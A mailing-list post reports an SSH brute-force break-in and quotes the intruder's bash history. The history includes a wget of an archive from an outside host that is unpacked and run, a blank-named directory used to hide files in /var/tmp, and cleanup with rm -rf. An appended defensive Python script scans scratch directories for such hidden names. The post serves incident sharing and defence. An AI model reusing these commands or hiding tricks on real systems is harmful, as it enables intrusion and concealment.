[Date Prev][Date Next]   [Thread Prev][Thread Next]   [Thread Index] [Date Index] [Author Index]

[K12OSN] OT: Break-In report

I thought you guys might be interested in seeing the tracks of a computer break-in. I won't say whose system it was (to protect the embarrassed), but the break-in was nothing but a brute-force ssh attempt at guessing usernames and passwords. A regular user account was compromised and here is his bash history:

cd who
cd /var/tmp
ls -a
cd " mkdir " "
cd " "
wget quest.dif.jp/x.tgz
tar zxvf x.tgz
cd x
./start dbdb
cd ..
ls -a
rm -rf *
ls -a
ps aux
ps aux | grep dan  (note: the hacked user account was "dan")

I particularly like the use of " " as a directory name. Nice and invisible. Also note that the invader put his files in two directories which have the "sticky" bit set: /dev/shm and /var/tmp

In the end, it seems that all the invader succeeded in doing was a bunch of port-scanning. The OS is going to be re-installed anyway, just to be safe.

Are there any organizations out there that this should be reported to? (For instance, the way one might send reports to an antivirus group or a content filtering group).
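As an added example (not part of the original post), here is a small audit script a sysadmin could run against the kind of sticky-bit scratch directories the intruder used above. It flags entries whose names are blank, whitespace-padded or contain control characters, which is exactly the " " trick that makes a working directory vanish from a casual `ls`. The directory list and the demo tree are constructed for illustration.

```python
"""Audit sticky-bit scratch dirs for deliberately hard-to-see entry names."""
import os
import stat
import tempfile

# Constructed defaults: the directories the post mentions, plus /tmp.
DEFAULT_DIRS = ("/var/tmp", "/dev/shm", "/tmp")


def is_suspicious_name(name: str) -> bool:
    """True if a file name looks designed to hide from casual `ls` output."""
    if name in (".", ".."):
        return False
    if name.strip() == "":          # " ", "  ", "\t": the trick in the post
        return True
    if name != name.strip():        # leading/trailing blanks: "x ", " .ssh"
        return True
    if any(ord(c) < 32 or c == "\x7f" for c in name):  # control characters
        return True
    return False


def is_sticky_world_writable(path: str) -> bool:
    """True for /var/tmp-style dirs (mode 1777) where any user may create files."""
    mode = os.stat(path).st_mode
    return bool(mode & stat.S_ISVTX) and bool(mode & stat.S_IWOTH)


def scan_dirs(dirs=DEFAULT_DIRS):
    """Return [(dir, entry_name, owner_uid)] for suspicious entries in dirs that exist."""
    findings = []
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for entry in os.listdir(d):
            if is_suspicious_name(entry):
                full = os.path.join(d, entry)
                # lstat so a planted symlink is reported as itself, not its target
                findings.append((d, entry, os.lstat(full).st_uid))
    return findings


def demo():
    """Constructed demo: a throwaway 1777 dir containing the post's ' ' directory."""
    base = tempfile.mkdtemp()
    os.chmod(base, 0o1777)
    os.mkdir(os.path.join(base, " "))   # the invisible directory from the history
    os.mkdir(os.path.join(base, "x"))   # an ordinary name, should not be flagged
    return [repr(e) for _, e, _ in scan_dirs([base])], is_sticky_world_writable(base)


if __name__ == "__main__":
    for d, e, uid in scan_dirs():
        print(f"{d}: suspicious entry {e!r} owned by uid {uid}")
```

Run it as root or as the user who owns the scratch directories; the uid in each finding points at the account to inspect, the way "dan" was identified above.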

